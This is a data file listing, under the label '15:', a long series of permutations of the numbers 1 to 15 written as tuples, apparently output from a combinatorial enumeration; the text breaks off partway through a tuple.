15:[(1,8,15,7,14,6,13,5,12,4,11,3,10,2,9),(1,9,2,10,3,11,4,12,5,13,6,14,7,15,8),(2,9,1,8,15,7,14,6,13,5,12,4,11,3,10),(2,9,1,10,3,11,4,12,5,13,6,14,7,15,8),(2,10,3,11,4,12,5,13,6,14,7,15,8,1,9),(3,10,1,8,15,7,14,6,13,5,12,4,11,2,9),(3,10,1,9,2,11,4,12,5,13,6,14,7,15,8),(3,10,2,9,1,8,15,7,14,6,13,5,12,4,11),(3,10,2,9,1,11,4,12,5,13,6,14,7,15,8),(3,10,2,11,4,12,5,13,6,14,7,15,8,1,9),(3,11,4,12,5,13,6,14,7,15,8,1,9,2,10),(3,11,4,12,5,13,6,14,7,15,8,1,10,2,9),(4,11,1,8,15,7,14,6,13,5,12,3,10,2,9),(4,11,1,9,2,10,3,12,5,13,6,14,7,15,8),(4,11,2,9,1,8,15,7,14,6,13,5,12,3,10),(4,11,2,9,1,10,3,12,5,13,6,14,7,15,8),(4,11,2,10,3,12,5,13,6,14,7,15,8,1,9),(4,11,3,10,1,8,15,7,14,6,13,5,12,2,9),(4,11,3,10,1,9,2,12,5,13,6,14,7,15,8),(4,11,3,10,2,9,1,8,15,7,14,6,13,5,12),(4,11,3,10,2,9,1,12,5,13,6,14,7,15,8),(4,11,3,10,2,12,5,13,6,14,7,15,8,1,9),(4,11,3,12,5,13,6,14,7,15,8,1,9,2,10),(4,11,3,12,5,13,6,14,7,15,8,1,10,2,9),(4,12,5,13,6,14,7,15,8,1,9,2,10,3,11),(4,12,5,13,6,14,7,15,8,1,9,2,11,3,10),(4,12,5,13,6,14,7,15,8,1,10,3,11,2,9),(4,12,5,13,6,14,7,15,8,1,11,3,10,2,9),(5,12,1,8,15,7,14,6,13,4,11,3,10,2,9),(5,12,1,9,2,10,3,11,4,13,6,14,7,15,8),(5,12,2,9,1,8,15,7,14,6,13,4,11,3,10),(5,12,2,9,1,10,3,11,4,13,6,14,7,15,8),(5,12,2,10,3,11,4,13,6,14,7,15,8,1,9),(5,12,3,10,1,8,15,7,14,6,13,4,11,2,9),(5,12,3,10,1,9,2,11,4,13,6,14,7,15,8),(5,12,3,10,2,9,1,8,15,7,14,6,13,4,11),(5,12,3,10,2,9,1,11,4,13,6,14,7,15,8),(5,12,3,10,2,11,4,13,6,14,7,15,8,1,9),(5,12,3,11,4,13,6,14,7,15,8,1,9,2,10),(5,12,3,11,4,13,6,14,7,15,8,1,10,2,9),(5,12,4,11,1,8,15,7,14,6,13,3,10,2,9),(5,12,4,11,1,9,2,10,3,13,6,14,7,15,8),(5,12,4,11,2,9,1,8,15,7,14,6,13,3,10),(5,12,4,11,2,9,1,10,3,13,6,14,7,15,8),(5,12,4,11,2,10,3,13,6,14,7,15,8,1,9),(5,12,4,11,3,10,1,8,15,7,14,6,13,2,9),(5,12,4,11,3,10,1,9,2,13,6,14,7,15,8),(5,12,4,11,3,10,2,9,1,8,15,7,14,6,13),(5,12,4,11,3,10,2,9,1,13,6,14,7,15,8),(5,12,4,11,3,10,2,13,6,14,7,15,8,1,9),(5,12,4,11,3,13,6,14,7,15,8,1,9,2,10),(5,12,4,11,3,13,6,14,7,15,8,1,10,2,9),(5,12,4,13,6,14,7,15,8,1,9,2,10,3,11),(5,12,4,13,6,14,7,15,8,1,9,2,11,3,10),(5,12,4,13,6,14,7,15,8,1,10,3,11,2,9),(5,12,4,13,6,14,7,15,8,1,11,3,10,2,9),(5,13,6,14,7,15,8,1,9,2,10,3,11,4,12),(5,13,6,14,7,15,8,1,9,2,10,3,12,4,11),(5,13,6,14,7,15,8,1,9,2,11,4,12,3,10),(5,13,6,14,7,15,8,1,9,2,12,4,11,3,10),(5,13,6,14,7,15,8,1,10,3,11,4,12,2,9),(5,13,6,14,7,15,8,1,10,3,12,4,11,2,9),(5,13,6,14,7,15,8,1,11,4,12,3,10,2,9),(5,13,6,14,7,15,8,1,12,4,11,3,10,2,9),(6,13,1,8,15,7,14,5,12,4,11,3,10,2,9),(6,13,1,9,2,10,3,11,4,12,5,14,7,15,8),(6,13,2,9,1,8,15,7,14,5,12,4,11,3,10),(6,13,2,9,1,10,3,11,4,12,5,14,7,15,8),(6,13,2,10,3,11,4,12,5,14,7,15,8,1,9),(6,13,3,10,1,8,15,7,14,5,12,4,11,2,9),(6,13,3,10,1,9,2,11,4,12,5,14,7,15,8),(6,13,3,10,2,9,1,8,15,7,14,5,12,4,11),(6,13,3,10,2,9,1,11,4,12,5,14,7,15,8),(6,13,3,10,2,11,4,12,5,14,7,15,8,1,9),(6,13,3,11,4,12,5,14,7,15,8,1,9,2,10),(6,13,3,11,4,12,5,14,7,15,8,1,10,2,9),(6,13,4,11,1,8,15,7,14,5,12,3,10,2,9),(6,13,4,11,1,9,2,10,3,12,5,14,7,15,8),(6,13,4,11,2,9,1,8,15,7,14,5,12,3,10),(6,13,4,11,2,9,1,10,3,12,5,14,7,15,8),(6,13,4,11,2,10,3,12,5,14,7,15,8,1,9),(6,13,4,11,3,10,1,8,15,7,14,5,12,2,9),(6,13,4,11,3,10,1,9,2,12,5,14,7,15,8),(6,13,4,11,3,10,2,9,1,8,15,7,14,5,12),(6,13,4,11,3,10,2,9,1,12,5,14,7,15,8),(6,13,4,11,3,10,2,12,5,14,7,15,8,1,9),(6,13,4,11,3,12,5,14,7,15,8,1,9,2,10),(6,13,4,11,3,12,5,14,7,15,8,1,10,2,9),(6,13,4,12,5,14,7,15,8,1,9,2,10,3,11),(6,13,4,12,5,14,7,15,8,1,9,2,11,3,10),(6,13,4,12,5,14,7,15,8,1,10,3,11,2,9),(6,13,4,12,5,14,7,15,8,1,11,3,10,2,9),(6,13,5,12,1,8,15,7,14,4,11,3,10,2,9),(6,13,5,12,1,9,2,10,3,11,4,14,7,15,8),(6,13,5,12,2,9,1,8,15,7,14,4,11,3,10),(6,13,5,12,2,9,1,10,3,11,4,14,7,15,8),(6,13,5,12,2,10,3,11,4,14,7,15,8,1,9),(6,13,5,12,3,10,1,8,15,7,14,4,11,2,9),(6,13,5,12,3,10,1,9,2,11,4,14,7,15,8),(6,13,5,12,3,10,2,9,1,8,15,7,14,4,11),(6,13,5,12,3,10,2,9,1,11,4,14,7,15,8),(6,13,5,12,3,10,2,11,4,14,7,15,8,1,9),(6,13,5,12,3,11,4,14,7,15,8,1,9,2,10),(6,13,5,12,3,11,4,14,7,15,8,1,10,2,9),(6,13,5,12,4,11,1,8,15,7,14,3,10,2,9),(6,13,5,12,4,11,1,9,2,10,3,14,7,15,8),(6,13,5,12,4,11,2,9,1,8,15,7,14,3,10),(6,13,5,12,4,11,2,9,1,10,3,14,7,15,8),(6,13,5,12,4,11,2,10,3,14,7,15,8,1,9),(6,13,5,12,4,11,3,10,1,8,15,7,14,2,9),(6,13,5,12,4,11,3,10,1,9,2,14,7,15,8),(6,13,5,12,4,11,3,10,2,9,1,8,15,7,14),(6,13,5,12,4,11,3,10,2,9,1,14,7,15,8),(6,13,5,12,4,11,3,10,2,14,7,15,8,1,9),(6,13,5,12,4,11,3,14,7,15,8,1,9,2,10),(6,13,5,12,4,11,3,14,7,15,8,1,10,2,9),(6,13,5,12,4,14,7,15,8,1,9,2,10,3,11),(6,13,5,12,4,14,7,15,8,1,9,2,11,3,10),(6,13,5,12,4,14,7,15,8,1,10,3,11,2,9),(6,13,5,12,4,14,7,15,8,1,11,3,10,2,9),(6,13,5,14,7,15,8,1,9,2,10,3,11,4,12),(6,13,5,14,7,15,8,1,9,2,10,3,12,4,11),(6,13,5,14,7,15,8,1,9,2,11,4,12,3,10),(6,13,5,14,7,15,8,1,9,2,12,4,11,3,10),(6,13,5,14,7,15,8,1,10,3,11,4,12,2,9),(6,13,5,14,7,15,8,1,10,3,12,4,11,2,9),(6,13,5,14,7,15,8,1,11,4,12,3,10,2,9),(6,13,5,14,7,15,8,1,12,4,11,3,10,2,9),(6,14,7,15,8,1,9,2,10,3,11,4,12,5,13),(6,14,7,15,8,1,9,2,10,3,11,4,13,5,12),(6,14,7,15,8,1,9,2,10,3,12,5,13,4,11),(6,14,7,15,8,1,9,2,10,3,13,5,12,4,11),(6,14,7,15,8,1,9,2,11,4,12,5,13,3,10),(6,14,7,15,8,1,9,2,11,4,13,5,12,3,10),(6,14,7,15,8,1,9,2,12,5,13,4,11,3,10),(6,14,7,15,8,1,9,2,13,5,12,4,11,3,10),(6,14,7,15,8,1,10,3,11,4,12,5,13,2,9),(6,14,7,15,8,1,10,3,11,4,13,5,12,2,9),(6,14,7,15,8,1,10,3,12,5,13,4,11,2,9),(6,14,7,15,8,1,10,3,13,5,12,4,11,2,9),(6,14,7,15,8,1,11,4,12,5,13,3,10,2,9),(6,14,7,15,8,1,11,4,13,5,12,3,10,2,9),(6,14,7,15,8,1,12,5,13,4,11,3,10,2,9),(6,14,7,15,8,1,13,5,12,4,11,3,10,2,9),(7,14,1,8,15,6,13,5,12,4,11,3,10,2,9),(7,14,1,9,2,10,3,11,4,12,5,13,6,15,8),(7,14,2,9,1,8,15,6,13,5,12,4,11,3,10),(7,14,2,9,1,10,3,11,4,12,5,13,6,15,8),(7,14,2,10,3,11,4,12,5,13,6,15,8,1,9),(7,14,3,10,1,8,15,6,13,5,12,4,11,2,9),(7,14,3,10,1,9,2,11,4,12,5,13,6,15,8),(7,14,3,10,2,9,1,8,15,6,13,5,12,4,11),(7,14,3,10,2,9,1,11,4,12,5,13,6,15,8),(7,14,3,10,2,11,4,12,5,13,6,15,8,1,9),(7,14,3,11,4,12,5,13,6,15,8,1,9,2,10),(7,14,3,11,4,12,5,13,6,15,8,1,10,2,9),(7,14,4,11,1,8,15,6,13,5,12,3,10,2,9),(7,14,4,11,1,9,2,10,3,12,5,13,6,15,8),(7,14,4,11,2,9,1,8,15,6,13,5,12,3,10),(7,14,4,11,2,9,1,10,3,12,5,13,6,15,8),(7,14,4,11,2,10,3,12,5,13,6,15,8,1,9),(7,14,4,11,3,10,1,8,15,6,13,5,12,2,9),(7,14,4,11,3,10,1,9,2,12,5,13,6,15,8),(7,14,4,11,3,10,2,9,1,8,15,6,13,5,12),(7,14,4,11,3,10,2,9,1,12,5,13,6,15,8),(7,14,4,11,3,10,2,12,5,13,6,15,8,1,9),(7,14,4,11,3,12,5,13,6,15,8,1,9,2,10),(7,14,4,11,3,12,5,13,6,15,8,1,10,2,9),(7,14,4,12,5,13,6,15,8,1,9,2,10,3,11),(7,14,4,12,5,13,6,15,8,1,9,2,11,3,10),(7,14,4,12,5,13,6,15,8,1,10,3,11,2,9),(7,14,4,12,5,13,6,15,8,1,11,3,10,2,9),(7,14,5,12,1,8,15,6,13,4,11,3,10,2,9),(7,14,5,12,1,9,2,10,3,11,4,13,6,15,8),(7,14,5,12,2,9,1,8,15,6,13,4,11,3,10),(7,14,5,12,2,9,1,10,3,11,4,13,6,15,8),(7,14,5,12,2,10,3,11,4,13,6,15,8,1,9),(7,14,5,12,3,10,1,8,15,6,13,4,11,2,9),(7,14,5,12,3,10,1,9,2,11,4,13,6,15,8),(7,14,5,12,3,10,2,9,1,8,15,6,13,4,11),(7,14,5,12,3,10,2,9,1,11,4,13,6,15,8),(7,14,5,12,3,10,2,11,4,13,6,15,8,1,9),(7,14,5,12,3,11,4,13,6,15,8,1,9,2,10),(7,14,5,12,3,11,4,13,6,15,8,1,10,2,9),(7,14,5,12,4,11,1,8,15,6,13,3,10,2,9),(7,14,5,12,4,11,1,9,2,10,3,13,6,15,8),(7,14,5,12,4,11,2,9,1,8,15,6,13,3,10),(7,14,5,12,4,11,2,9,1,10,3,13,6,15,8),(7,14,5,12,4,11,2,10,3,13,6,15,8,1,9),(7,14,5,12,4,11,3,10,1,8,15,6,13,2,9),(7,14,5,12,4,11,3,10,1,9,2,13,6,15,8),(7,14,5,12,4,11,3,10,2,9,1,8,15,6,13),(7,14,5,12,4,11,3,10,2,9,1,13,6,15,8),(7,14,5,12,4,11,3,10,2,13,6,15,8,1,9),(7,14,5,12,4,11,3,13,6,15,8,1,9,2,10),(7,14,5,12,4,11,3,13,6,15,8,1,10,2,9),(7,14,5,12,4,13,6,15,8,1,9,2,10,3,11),(7,14,5,12,4,13,6,15,8,1,9,2,11,3,10),(7,14,5,12,4,13,6,15,8,1,10,3,11,2,9),(7,14,5,12,4,13,6,15,8,1,11,3,10,2,9),(7,14,5,13,6,15,8,1,9,2,10,3,11,4,12),(7,14,5,13,6,15,8,1,9,2,10,3,12,4,11),(7,14,5,13,6,15,8,1,9,2,11,4,12,3,10),(7,14,5,13,6,15,8,1,9,2,12,4,11,3,10),(7,14,5,13,6,15,8,1,10,3,11,4,12,2,9),(7,14,5,13,6,15,8,1,10,3,12,4,11,2,9),(7,14,5,13,6,15,8,1,11,4,12,3,10,2,9),(7,14,5,13,6,15,8,1,12,4,11,3,10,2,9),(7,14,6,13,1,8,15,5,12,4,11,3,10,2,9),(7,14,6,13,1,9,2,10,3,11,4,12,5,15,8),(7,14,6,13,2,9,1,8,15,5,12,4,11,3,10),(7,14,6,13,2,9,1,10,3,11,4,12,5,15,8),(7,14,6,13,2,10,3,11,4,12,5,15,8,1,9),(7,14,6,13,3,10,1,8,15,5,12,4,11,2,9),(7,14,6,13,3,10,1,9,2,11,4,12,5,15,8),(7,14,6,13,3,10,2,9,1,8,15,5,12,4,11),(7,14,6,13,3,10,2,9,1,11,4,12,5,15,8),(7,14,6,13,3,10,2,11,4,12,5,15,8,1,9),(7,14,6,13,3,11,4,12,5,15,8,1,9,2,10),(7,14,6,13,3,11,4,12,5,15,8,1,10,2,9),(7,14,6,13,4,11,1,8,15,5,12,3,10,2,9),(7,14,6,13,4,11,1,9,2,10,3,12,5,15,8),(7,14,6,13,4,11,2,9,1,8,15,5,12,3,10),(7,14,6,13,4,11,2,9,1,10,3,12,5,15,8),(7,14,6,13,4,11,2,10,3,12,5,15,8,1,9),(7,14,6,13,4,11,3,10,1,8,15,5,12,2,9),(7,14,6,13,4,11,3,10,1,9,2,12,5,15,8),(7,14,6,13,4,11,3,10,2,9,1,8,15,5,12),(7,14,6,13,4,11,3,10,2,9,1,12,5,15,8),(7,14,6,13,4,11,3,10,2,12,5,15,8,1,9),(7,14,6,13,4,11,3,12,5,15,8,1,9,2,10),(7,14,6,13,4,11,3,12,5,15,8,1,10,2,9),(7,14,6,13,4,12,5,15,8,1,9,2,10,3,11),(7,14,6,13,4,12,5,15,8,1,9,2,11,3,10),(7,14,6,13,4,12,5,15,8,1,10,3,11,2,9),(7,14,6,13,4,12,5,15,8,1,11,3,10,2,9),(7,14,6,13,5,12,1,8,15,4,11,3,10,2,9),(7,14,6,13,5,12,1,9,2,10,3,11,4,15,8),(7,14,6,13,5,12,2,9,1,8,15,4,11,3,10),(7,14,6,13,5,12,2,9,1,10,3,11,4,15,8),(7,14,6,13,5,12,2,10,3,11,4,15,8,1,9),(7,14,6,13,5,12,3,10,1,8,15,4,11,2,9),(7,14,6,13,5,12,3,10,1,9,2,11,4,15,8),(7,14,6,13,5,12,3,10,2,9,1,8,15,4,11),(7,14,6,13,5,12,3,10,2,9,1,11,4,15,8),(7,14,6,13,5,12,3,10,2,11,4,15,8,1,9),(7,14,6,13,5,12,3,11,4,15,8,1,9,2,10),(7,14,6,13,5,12,3,11,4,15,8,1,10,2,9),(7,14,6,13,5,12,4,11,1,8,15,3,10,2,9),(7,14,6,13,5,12,4,11,1,9,2,10,3,15,8),(7,14,6,13,5,12,4,11,2,9,1,8,15,3,10),(7,14,6,13,5,12,4,11,2,9,1,10,3,15,8),(7,14,6,13,5,12,4,11,2,10,3,15,8,1,9),(7,14,6,13,5,12,4,11,3,10,1,8,15,2,9),(7,14,6,13,5,12,4,11,3,10,1,9,2,15,8),(7,14,6,13,5,12,4,11,3,10,2,9,1,8,15),(7,14,6,13,5,12,4,11,3,10,2,9,1,15,8),(7,14,6,13,5,12,4,11,3,10,2,15,8,1,9),(7,14,6,13,5,12,4,11,3,15,8,1,9,2,10),(7,14,6,13,5,12,4,11,3,15,8,1,10,2,9),(7,14,6,13,5,12,4,15,8,1,9,2,10,3,11),(7,14,6,13,5,12,4,15,8,1,9,2,11,3,10),(7,14,6,13,5,12,4,15,8,1,10,3,11,2,9),(7,14,6,13,5,12,4,15,8,1,11,3,10,2,9),(7,14,6,13,5,15,8,1,9,2,10,3,11,4,12),(7,14,6,13,5,15,8,1,9,2,10,3,12,4,11),(7,14,6,13,5,15,8,1,9,2,11,4,12,3,10),(7,14,6,13,5,15,8,1,9,2,12,4,11,3,10),(7,14,6,13,5,15,8,1,10,3,11,4,12,2,9),(7,14,6,13,5,15,8,1,10,3,12,4,11,2,9),(7,14,6,13,5,15,8,1,11,4,12,3,10,2,9),(7,14,6,13,5,15,8,1,12,4,11,3,10,2,9),(7,14,6,15,8,1,9,2,10,3,11,4,12,5,13),(7,14,6,15,8,1,9,2,10,3,11,4,13,5,12),(7,14,6,15,8,1,9,2,10,3,12,5,13,4,11),(7,14,6,15,8,1,9,2,10,3,13,5,12,4,11),(7,14,6,15,8,1,9,2,11,4,12,5,13,3,10),(7,14,6,15,8,1,9,2,11,4,13,5,12,3,10),(7,14,6,15,8,1,9,2,12,5,13,4,11,3,10),(7,14,6,15,8,1,9,2,13,5,12,4,11,3,10),(7,14,6,15,8,1,10,3,11,4,12,5,13,2,9),(7,14,6,15,8,1,10,3,11,4,13,5,12,2,9),(7,14,6,15,8,1,10,3,12,5,13,4,11,2,9),(7,14,6,15,8,1,10,3,13,5,12,4,11,2,9),(7,14,6,15,8,1,11,4,12,5,13,3,10,2,9),(7,14,6,15,8,1,11,4,13,5,12,3,10,2,9),(7,14,6,15,8,1,12,5,13,4,11,3,10,2,9),(7,14,6,15,8,1,13,5,12,4,11,3,10,2,9),(7,15,8,1,9,2,10,3,11,4,12,5,13,6,14),(7,15,8,1,9,2,10,3,11,4,12,5,14,6,13),(7,15,8,1,9,2,10,3,11,4,13,6,14,5,12),(7,15,8,1,9,2,10,3,11,4,14,6,13,5,12),(7,15,8,1,9,2,10,3,12,5,13,6,14,4,11),(7,15,8,1,9,2,10,3,12,5,14,6,13,4,11),(7,15,8,1,9,2,10,3,13,6,14,5,12,4,11),(7,15,8,1,9,2,10,3,14,6,13,5,12,4,11),(7,15,8,1,9,2,11,4,12,5,13,6,14,3,10),(7,15,8,1,9,2,11,4,12,5,14,6,13,3,10),(7,15,8,1,9,2,11,4,13,6,14,5,12,3,10),(7,15,8,1,9,2,11,4,14,6,13,5,12,3,10),(7,15,8,1,9,2,12,5,13,6,14,4,11,3,10),(7,15,8,1,9,2,12,5,14,6,13,4,11,3,10),(7,15,8,1,9,2,13,6,14,5,12,4,11,3,10),(7,15,8,1,9,2,14,6,13,5,12,4,11,3,10),(7,15,8,1,10,3,11,4,12,5,13,6,14,2,9),(7,15,8,1,10,3,11,4,12,5,14,6,13,2,9),(7,15,8,1,10,3,11,4,13,6,14,5,12,2,9),(7,15,8,1,10,3,11,4,14,6,13,5,12,2,9),(7,15,8,1,10,3,12,5,13,6,14,4,11,2,9),(7,15,8,1,10,3,12,5,14,6,13,4,11,2,9),(7,15,8,1,10,3,13,6,14,5,12,4,11,2,9),(7,15,8,1,10,3,14,6,13,5,12,4,11,2,9),(7,15,8,1,11,4,12,5,13,6,14,3,10,2,9),(7,15,8,1,11,4,12,5,14,6,13,3,10,2,9),(7,15,8,1,11,4,13,6,14,5,12,3,10,2,9),(7,15,8,1,11,4,14,6,13,5,12,3,10,2,9),(7,15,8,1,12,5,13,6,14,4,11,3,10,2,9),(7,15,8,1,12,5,14,6,13,4,11,3,10,2,9),(7,15,8,1,13,6,14,5,12,4,11,3,10,2,9),(7,15,8,1,14,6,13,5,12,4,11,3,10,2,9),(8,1,9,2,10,3,11,4,12,5,13,6,14,7,15),(8,1,9,2,10,3,11,4,12,5,13,6,15,7,14),(8,1,9,2,10,3,11,4,12,5,14,7,15,6,13),(8,1,9,2,10,3,11,4,12,5,15,7,14,6,13),(8,1,9,2,10,3,11,4,13,6,14,7,15,5,12),(8,1,9,2,10,3,11,4,13,6,15,7,14,5,12),(8,1,9,2,10,3,11,4,14,7,15,6,13,5,12),(8,1,9,2,10,3,11,4,15,7,14,6,13,5,12),(8,1,9,2,10,3,12,5,13,6,14,7,15,4,11),(8,1,9,2,10,3,12,5,13,6,15,7,14,4,11),(8,1,9,2,10,3,12,5,14,7,15,6,13,4,11),(8,1,9,2,10,3,12,5,15,7,14,6,13,4,11),(8,1,9,2,10,3,13,6,14,7,15,5,12,4,11),(8,1,9,2,10,3,13,6,15,7,14,5,12,4,11),(8,1,9,2,10,3,14,7,15,6,13,5,12,4,11),(8,1,9,2,10,3,15,7,14,6,13,5,12,4,11),(8,1,9,2,11,4,12,5,13,6,14,7,15,3,10),(8,1,9,2,11,4,12,5,13,6,15,7,14,3,10),(8,1,9,2,11,4,12,5,14,7,15,6,13,3,10),(8,1,9,2,11,4,12,5,15,7,14,6,13,3,10),(8,1,9,2,11,4,13,6,14,7,15,5,12,3,10),(8,1,9,2,11,4,13,6,15,7,14,5,12,3,10),(8,1,9,2,11,4,14,7,15,6,13,5,12,3,10),(8,1,9,2,11,4,15,7,14,6,13,5,12,3,10),(8,1,9,2,12,5,13,6,14,7,15,4,11,3,10),(8,1,9,2,12,5,13,6,15,7,14,4,11,3,10),(8,1,9,2,12,5,14,7,15,6,13,4,11,3,10),(8,1,9,2,12,5,15,7,14,6,13,4,11,3,10),(8,1,9,2,13,6,14,7,15,5,12,4,11,3,10),(8,1,9,2,13,6,15,7,14,5,12,4,11,3,10),(8,1,9,2,14,7,15,6,13,5,12,4,11,3,10),(8,1,9,2,15,7,14,6,13,5,12,4,11,3,10),(8,1,10,3,11,4,12,5,13,6,14,7,15,2,9),(8,1,10,3,11,4,12,5,13,6,15,7,14,2,9),(8,1,10,3,11,4,12,5,14,7,15,6,13,2,9),(8,1,10,3,11,4,12,5,15,7,14,6,13,2,9),(8,1,10,3,11,4,13,6,14,7,15,5,12,2,9),(8,1,10,3,11,4,13,6,15,7,14,5,12,2,9),(8,1,10,3,11,4,14,7,15,6,13,5,12,2,9),(8,1,10,3,11,4,15,7,14,6,13,5,12,2,9),(8,1,10,3,12,5,13,6,14,7,15,4,11,2,9),(8,1,10,3,12,5,13,6,15,7,14,4,11,2,9),(8,1,10,3,12,5,14,7,15,6,13,4,11,2,9),(8,1,10,3,12,5,15,7,14,6,13,4,11,2,9),(8,1,10,3,13,6,14,7,15,5,12,4,11,2,9),(8,1,10,3,13,6,15,7,14,5,12,4,11,2,9),(8,1,10,3,14,7,15,6,13,5,12,4,11,2,9),(8,1,10,3,15,7,14,6,13,5,12,4,11,2,9),(8,1,11,4,12,5,13,6,14,7,15,3,10,2,9),(8,1,11,4,12,5,13,6,15,7,14,3,10,2,9),(8,1,11,4,12,5,14,7,15,6,13,3,10,2,9),(8,1,11,4,12,5,15,7,14,6,13,3,10,2,9),(8,1,11,4,13,6,14,7,15,5,12,3,10,2,9),(8,1,11,4,13,6,15,7,14,5,12,3,10,2,9),(8,1,11,4,14,7,15,6,13,5,12,3,10,2,9),(8,1,11,4,15,7,14,6,13,5,12,3,10,2,9),(8,1,12,5,13,6,14,7,15,4,11,3,10,2,9),(8,1,12,5,13,6,15,7,14,4,11,3,10,2,9),(8,1,12,5,14,7,15,6,13,4,11,3,10,2,9),(8,1,12,5,15,7,14,6,13,4,11,3,10,2,9),(8,1,13,6,14,7,15,5,12,4,11,3,10,2,9),(8,1,13,6,15,7,14,5,12,4,11,3,10,2,9),(8,1,14,7,15,6,13,5,12,4,11,3,10,2,9),(8,1,15,7,14,6,13,5,12,4,11,3,10,2,9),(8,15,1,9,2,10,3,11,4,12,5,13,6,14,7),(8,15,2,9,1,10,3,11,4,12,5,13,6,14,7),(8,15,3,10,1,9,2,11,4,12,5,13,6,14,7),(8,15,3,10,2,9,1,11,4,12,5,13,6,14,7),(8,15,4,11,1,9,2,10,3,12,5,13,6,14,7),(8,15,4,11,2,9,1,10,3,12,5,13,6,14,7),(8,15,4,11,3,10,1,9,2,12,5,13,6,14,7),(8,15,4,11,3,10,2,9,1,12,5,13,6,14,7),(8,15,5,12,1,9,2,10,3,11,4,13,6,14,7),(8,15,5,12,2,9,1,10,3,11,4,13,6,14,7),(8,15,5,12,3,10,1,9,2,11,4,13,6,14,7),(8,15,5,12,3,10,2,9,1,11,4,13,6,14,7),(8,15,5,12,4,11,1,9,2,10,3,13,6,14,7),(8,15,5,12,4,11,2,9,1,10,3,13,6,14,7),(8,15,5,12,4,11,3,10,1,9,2,13,6,14,7),(8,15,5,12,4,11,3,10,2,9,1,13,6,14,7),(8,15,6,13,1,9,2,10,3,11,4,12,5,14,7),(8,15,6,13,2,9,1,10,3,11,4,12,5,14,7),(8,15,6,13,3,10,1,9,2,11,4,12,5,14,7),(8,15,6,13,3,10,2,9,1,11,4,12,5,14,7),(8,15,6,13,4,11,1,9,2,10,3,12,5,14,7),(8,15,6,13,4,11,2,9,1,10,3,12,5,14,7),(8,15,6,13,4,11,3,10,1,9,2,12,5,14,7),(8,15,6,13,4,11,3,10,2,9,1,12,5,14,7),(8,15,6,13,5,12,1,9,2,10,3,11,4,14,7),(8,15,6,13,5,12,2,9,1,10,3,11,4,14,7),(8,15,6,13,5,12,3,10,1,9,2,11,4,14,7),(8,15,6,13,5,12,3,10,2,9,1,11,4,14,7),(8,15,6,13,5,12,4,11,1,9,2,10,3,14,7),(8,15,6,13,5,12,4,11,2,9,1,10,3,14,7),(8,15,6,13,5,12,4,11,3,10,1,9,2,14,7),(8,15,6,13,5,12,4,11,3,10,2,9,1,14,7),(8,15,7,14,1,9,2,10,3,11,4,12,5,13,6),(8,15,7,14,2,9,1,10,3,11,4,12,5,13,6),(8,15,7,14,3,10,1,9,2,11,4,12,5,13,6),(8,15,7,14,3,10,2,9,1,11,4,12,5,13,6),(8,15,7,14,4,11,1,9,2,10,3,12,5,13,6),(8,15,7,14,4,11,2,9,1,10,3,12,5,13,6),(8,15,7,14,4,11,3,10,1,9,2,12,5,13,6),(8,15,7,14,4,11,3,10,2,9,1,12,5,13,6),(8,15,7,14,5,12,1,9,2,10,3,11,4,13,6),(8,15,7,14,5,12,2,9,1,10,3,11,4,13,6),(8,15,7,14,5,12,3,10,1,9,2,11,4,13,6),(8,15,7,14,5,12,3,10,2,9,1,11,4,13,6),(8,15,7,14,5,12,4,11,1,9,2,10,3,13,6),(8,15,7,14,5,12,4,11,2,9,1,10,3,13,6),(8,15,7,14,5,12,4,11,3,10,1,9,2,13,6),(8,15,7,14,5,12,4,11,3,10,2,9,1,13,6),(8,15,7,14,6,13,1,9,2,10,3,11,4,12,5),(8,15,7,14,6,13,2,9,1,10,3,11,4,12,5),(8,15,7,14,6,13,3,10,1,9,2,11,4,12,5),(8,15,7,14,6,13,3,10,2,9,1,11,4,12,5),(8,15,7,14,6,13,4,11,1,9,2,10,3,12,5),(8,15,7,14,6,13,4,11,2,9,1,10,3,12,5),(8,15,7,14,6,13,4,11,3,10,1,9,2,12,5),(8,15,7,14,6,13,4,11,3,10,2,9,1,12,5),(8,15,7,14,6,13,5,12,1,9,2,10,3,11,4),(8,15,7,14,6,13,5,12,2,9,1,10,3,11,4),(8,15,7,14,6,13,5,12,3,10,1,9,2,11,4),(8,15,7,14,6,13,5,12,3,10,2,9,1,11,4),(8,15,7,14,6,13,5,12,4,11,1,9,2,10,3),(8,15,7,14,6,13,5,12,4,11,2,9,1,10,3),(8,15,7,14,6,13,5,12,4,11,3,10,1,9,2),(8,15,7,14,6,13,5,12,4,11,3,10,2,9,1),(9,1,8,15,2,10,3,11,4,12,5,13,6,14,7),(9,1,8,15,3,10,2,11,4,12,5,13,6,14,7),(9,1,8,15,4,11,2,10,3,12,5,13,6,14,7),(9,1,8,15,4,11,3,10,2,12,5,13,6,14,7),(9,1,8,15,5,12,2,10,3,11,4,13,6,14,7),(9,1,8,15,5,12,3,10,2,11,4,13,6,14,7),(9,1,8,15,5,12,4,11,2,10,3,13,6,14,7),(9,1,8,15,5,12,4,11,3,10,2,13,6,14,7),(9,1,8,15,6,13,2,10,3,11,4,12,5,14,7),(9,1,8,15,6,13,3,10,2,11,4,12,5,14,7),(9,1,8,15,6,13,4,11,2,10,3,12,5,14,7),(9,1,8,15,6,13,4,11,3,10,2,12,5,14,7),(9,1,8,15,6,13,5,12,2,10,3,11,4,14,7),(9,1,8,15,6,13,5,12,3,10,2,11,4,14,7),(9,1,8,15,6,13,5,12,4,11,2,10,3,14,7),(9,1,8,15,6,13,5,12,4,11,3,10,2,14,7),(9,1,8,15,7,14,2,10,3,11,4,12,5,13,6),(9,1,8,15,7,14,3,10,2,11,4,12,5,13,6),(9,1,8,15,7,14,4,11,2,10,3,12,5,13,6),(9,1,8,15,7,14,4,11,3,10,2,12,5,13,6),(9,1,8,15,7,14,5,12,2,10,3,11,4,13,6),(9,1,8,15,7,14,5,12,3,10,2,11,4,13,6),(9,1,8,15,7,14,5,12,4,11,2,10,3,13,6),(9,1,8,15,7,14,5,12,4,11,3,10,2,13,6),(9,1,8,15,7,14,6,13,2,10,3,11,4,12,5),(9,1,8,15,7,14,6,13,3,10,2,11,4,12,5),(9,1,8,15,7,14,6,13,4,11,2,10,3,12,5),(9,1,8,15,7,14,6,13,4,11,3,10,2,12,5),(9,1,8,15,7,14,6,13,5,12,2,10,3,11,4),(9,1,8,15,7,14,6,13,5,12,3,10,2,11,4),(9,1,8,15,7,14,6,13,5,12,4,11,2,10,3),(9,1,8,15,7,14,6,13,5,12,4,11,3,10,2),(9,2,10,1,8,15,3,11,4,12,5,13,6,14,7),(9,2,10,1,8,15,4,11,3,12,5,13,6,14,7),(9,2,10,1,8,15,5,12,3,11,4,13,6,14,7),(9,2,10,1,8,15,5,12,4,11,3,1